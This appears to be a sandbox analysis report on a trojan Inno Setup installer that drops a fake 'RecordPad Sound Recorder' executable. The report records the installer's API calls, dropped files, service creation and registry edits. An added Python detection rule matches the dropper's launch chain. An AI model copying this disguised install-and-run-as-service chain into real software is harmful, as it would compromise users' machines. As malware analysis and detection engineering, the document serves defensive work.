Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_00455800 PostMessageA, PostMessageA, SetForegroundWindow, NtdllDefWindowProc_A
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_00473F28 NtdllDefWindowProc_A
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_0042E6DC: CreateFileA, DeviceIoControl, GetLastError, CloseHandle, SetLastError
Source: C:\Users\user\Desktop\tOniaJ21lj.exe | Code function: 0_2_0040936C GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, GetLastError, ExitWindowsEx
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_00453FD0 GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, GetLastError, ExitWindowsEx
Source: C:\Users\user\Desktop\tOniaJ21lj.exe | Code function: 0_2_00408330
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_0046C5C4
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_00434CFC
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_0047B5CE
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_00463B8C
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_004822A0
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_00488444
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_004444A4
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_0045C87C
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_004308A0
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_00444B9C
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_00444FA8
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_004813C8
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_0043D784
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_00459850
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_00465BDC
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_0042FD30
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_00443EFC
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_00433FF8
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Code function: 3_2_00401051
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Code function: 3_2_00401C26
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Code function: 3_2_00406C87
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Code function: 4_2_00401051
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Code function: 4_2_00401C26
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Code function: 4_2_00406C87
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Code function: 4_2_0260F028
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Code function: 4_2_0261E1FD
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Code function: 4_2_02622E24
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Code function: 4_2_0261E615
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Code function: 4_2_02619EF4
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Code function: 4_2_02624E99
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Code function: 4_2_02625410
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Code function: 4_2_0261ACAA
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Code function: 4_2_026184B2
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Code function: 4_2_0261DD09
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\RecordPad Sound Recorder\Qt5OpenGL.dll (copy) 7623B596CFD989413FEA2FE355607B029EF8E64067275CBF81863688128738B0
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Code function: String function: 026253A0 appears 137 times
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Code function: String function: 02618B50 appears 37 times
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: String function: 00405964 appears 103 times
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: String function: 00406A2C appears 38 times
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: String function: 0045618C appears 68 times
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: String function: 00403400 appears 59 times
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: String function: 00455F80 appears 95 times
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: String function: 00451F4C appears 88 times
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: String function: 0040785C appears 43 times
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: String function: 00408B74 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: String function: 00403494 appears 84 times
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: String function: 00445808 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: String function: 00445AD8 appears 59 times
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: String function: 00403684 appears 211 times
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: String function: 00433F10 appears 32 times
Source: tOniaJ21lj.exe | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: tOniaJ21lj.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: tOniaJ21lj.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
Source: tOniaJ21lj.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: tOniaJ21lj.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: tOniaJ21lj.tmp.0.dr | Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
Source: is-O2PKH.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-O2PKH.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
Source: is-O2PKH.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: is-O2PKH.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-O2PKH.tmp.1.dr | Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
Source: is-VDBC5.tmp.1.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: tOniaJ21lj.exe, 00000000.00000003.2018211873.0000000002098000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameshfolder.dll~/ vs tOniaJ21lj.exe
Source: tOniaJ21lj.exe, 00000000.00000003.2017811455.0000000002310000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameshfolder.dll~/ vs tOniaJ21lj.exe
Source: tOniaJ21lj.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: recordpadsoundrecorder32.exe.1.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: is-UCHQL.tmp.1.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: _RegDLL.tmp.1.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: UID Finder 6.11.66.exe.3.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine | Classification label: mal100.troj.evad.winEXE@8/49@1/2
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Code function: 4_2_02610870 _memset,FormatMessageA,GetLastError,FormatMessageA,GetLastError
Source: C:\Users\user\Desktop\tOniaJ21lj.exe | Code function: 0_2_0040936C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_00453FD0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Code function: 1_2_004547F8 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Code function: 3_2_00402588 CreateServiceA
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Code function: 4_2_0040D117 CreateServiceA
Source: C:\Users\user\Desktop\tOniaJ21lj.exe | Code function: 0_2_00409AD0 FindResourceA,SizeofResource,LoadResource,LockResource
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Code function: 3_2_00402299 StartServiceCtrlDispatcherA
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Code function: 3_2_00402299 StartServiceCtrlDispatcherA
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Code function: 4_2_00402299 StartServiceCtrlDispatcherA
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | File created: C:\Users\user\AppData\Local\RecordPad Sound Recorder
Source: C:\Users\user\Desktop\tOniaJ21lj.exe | File created: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp
Source: Yara match | File source: 3.0.recordpadsoundrecorder32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.recordpadsoundrecorder32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000000.2036104577.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.2033651879.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-OIVVM.tmp, type: DROPPED
Source: Yara match | File source: C:\ProgramData\UID Finder 6.11.66\UID Finder 6.11.66.exe, type: DROPPED
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\tOniaJ21lj.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: tOniaJ21lj.exe | ReversingLabs: Detection: 21%
Source: C:\Users\user\Desktop\tOniaJ21lj.exe | File read: C:\Users\user\Desktop\tOniaJ21lj.exe
Source: unknown | Process created: C:\Users\user\Desktop\tOniaJ21lj.exe "C:\Users\user\Desktop\tOniaJ21lj.exe"
Source: C:\Users\user\Desktop\tOniaJ21lj.exe | Process created: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp "C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp" /SL5="$10474,4719378,54272,C:\Users\user\Desktop\tOniaJ21lj.exe"
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Process created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe "C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe" -i
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Process created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe "C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe" -s
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Source: C:\Users\user\Desktop\tOniaJ21lj.exe | Process created: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp "C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp" /SL5="$10474,4719378,54272,C:\Users\user\Desktop\tOniaJ21lj.exe"
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Process created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe "C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe" -i
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Process created: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe "C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe" -s
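The process-creation lines above describe the whole delivery chain: the Inno Setup stub re-executes itself from Temp\is-A11IR.tmp with the /SL5= switch, and that child launches recordpadsoundrecorder32.exe from under %LOCALAPPDATA%, first with -i and then with -s. The detection below is an added example, not Joe Sandbox or sample code, that encodes that chain over constructed Sysmon-style process events. The PIDs, the benign control installer and the regular expressions are assumptions; the /SL5= re-exec by itself is normal Inno Setup behaviour and is used only as parent context.

```python
r"""Detection for the launch chain recorded above, run over constructed process-creation
events (Sysmon EID 1 / 4688-style fields). Added example, not Joe Sandbox or sample code:
an Inno Setup stub re-executes itself as Temp\is-XXXXX.tmp\<name>.tmp with /SL5=, and
that child then starts an executable under %LOCALAPPDATA% with the -i and -s switches."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record; field names are assumptions."""
    pid: int
    ppid: int
    image: str
    command_line: str


# Inno Setup's own re-exec convention: /SL5="$<hwnd hex>,<size>,<size>,<original exe>"
INNO_SL5 = re.compile(r'/SL5="\$[0-9A-Fa-f]+,\d+,\d+,', re.IGNORECASE)
INNO_TMP_IMAGE = re.compile(r"\\AppData\\Local\\Temp\\is-[A-Z0-9]{5}\.tmp\\[^\\]+\.tmp$", re.IGNORECASE)
# A payload installed into the user profile rather than Program Files: no admin rights needed.
LOCALAPPDATA_EXE = re.compile(r"\\AppData\\Local\\(?!Temp\\).+\.exe$", re.IGNORECASE)
SWITCHES = ("-i", "-s")  # install / run-as-service switches seen in the report's command lines


def trailing_args(command_line):
    """Arguments after the (possibly quoted) image path; enough for switch inspection."""
    cmd = command_line.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        rest = cmd[end + 1:] if end != -1 else ""
    else:
        rest = cmd.partition(" ")[2]
    return rest.split()


def detect_inno_localappdata_chain(events):
    """One alert per %LOCALAPPDATA% executable that an Inno Setup stub launched with -i/-s.
    Severity is high when the same binary was run to install (-i) and then as a service (-s)."""
    by_pid = {e.pid: e for e in events}
    hits = {}
    for e in events:
        parent = by_pid.get(e.ppid)
        if parent is None or not INNO_TMP_IMAGE.search(parent.image) or not INNO_SL5.search(parent.command_line):
            continue
        if not LOCALAPPDATA_EXE.search(e.image):
            continue
        switches = [a.lower() for a in trailing_args(e.command_line) if a.lower() in SWITCHES]
        if not switches:
            continue
        hit = hits.setdefault(e.image.lower(),
                              {"image": e.image, "installer": parent.image, "switches": [], "pids": []})
        hit["switches"].extend(switches)
        hit["pids"].append(e.pid)
    for hit in hits.values():
        hit["severity"] = "high" if hit["switches"] == ["-i", "-s"] else "medium"
    return list(hits.values())


# Constructed events mirroring the process tree in the report; PIDs are invented.
SAMPLE_EVENTS = [
    ProcEvent(1000, 500, r"C:\Users\user\Desktop\tOniaJ21lj.exe", r'"C:\Users\user\Desktop\tOniaJ21lj.exe"'),
    ProcEvent(1010, 1000, r"C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp",
              r'"C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp" /SL5="$10474,4719378,54272,C:\Users\user\Desktop\tOniaJ21lj.exe"'),
    ProcEvent(1020, 1010, r"C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe",
              r'"C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe" -i'),
    ProcEvent(1030, 1010, r"C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe",
              r'"C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe" -s'),
    # Benign control: an ordinary Inno Setup installer that launches the app it put in Program Files.
    ProcEvent(2000, 500, r"C:\Users\user\Downloads\setup.exe", r'"C:\Users\user\Downloads\setup.exe"'),
    ProcEvent(2010, 2000, r"C:\Users\user\AppData\Local\Temp\is-Q7B2K.tmp\setup.tmp",
              r'"C:\Users\user\AppData\Local\Temp\is-Q7B2K.tmp\setup.tmp" /SL5="$20A1C,123456,54272,C:\Users\user\Downloads\setup.exe"'),
    ProcEvent(2020, 2010, r"C:\Program Files\Example\example.exe", r'"C:\Program Files\Example\example.exe"'),
]

if __name__ == "__main__":
    for alert in detect_inno_localappdata_chain(SAMPLE_EVENTS):
        print(alert)
```

A legitimate Inno Setup package performs the same re-exec, so the rule keys on where the launched binary lives (user-writable %LOCALAPPDATA% rather than Program Files) and on the -i/-s pair, which is why the Program Files control in the sample does not alert. The binary also imports CreateServiceA and StartServiceCtrlDispatcherA (see the code-function lines above), so service-installation telemetry is the natural second signal before escalating.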
Source: C:\Users\user\Desktop\tOniaJ21lj.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\tOniaJ21lj.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Section loaded: msacm32.dll
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Section loaded: appxsip.dll
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Section loaded: opcservices.dll
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Section loaded: appxsip.dll
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Section loaded: opcservices.dll
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: licensemanagersvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: licensemanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: clipc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp | Window found: window name: TMainForm
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: tOniaJ21lj.exe | Static file information: File size 4969628 > 1048576
Source: Binary string: msvcp120.amd64.pdb | source: is-FR4FM.tmp.1.dr
Source: Binary string: d:\agent\_work\2\s\\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdb | source: is-K3HBS.tmp.1.dr
Source: Binary string: D:\Work\_\QtAV\QtAV-Desktop_Qt_5_15_1_MSVC2019_64bit\lib_win_x86_64\QtAVWidgets1.pdb++ | source: is-8ECK7.tmp.1.dr
Source: Binary string: C:\Users\qt\work\qt\qtwinextras\lib\Qt5WinExtras.pdb.. | source: is-RV2D1.tmp.1.dr
Source: Binary string: msvcr120.amd64.pdb | source: is-C4R5U.tmp.1.dr
